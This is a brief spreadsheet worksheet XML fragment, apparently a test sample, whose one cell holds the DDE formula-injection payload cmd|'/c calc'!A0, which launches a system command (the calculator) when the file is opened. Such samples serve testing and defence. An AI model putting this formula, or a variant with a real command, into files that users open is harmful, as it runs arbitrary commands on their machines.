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x:worksheet xmlns:x="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <x:sheetData>
    <x:row r="1">
      <x:c r="A1">
        <x:f>cmd|'/c calc'!A0</x:f>
      </x:c>
    </x:row>
  </x:sheetData>
</x:worksheet>
</file>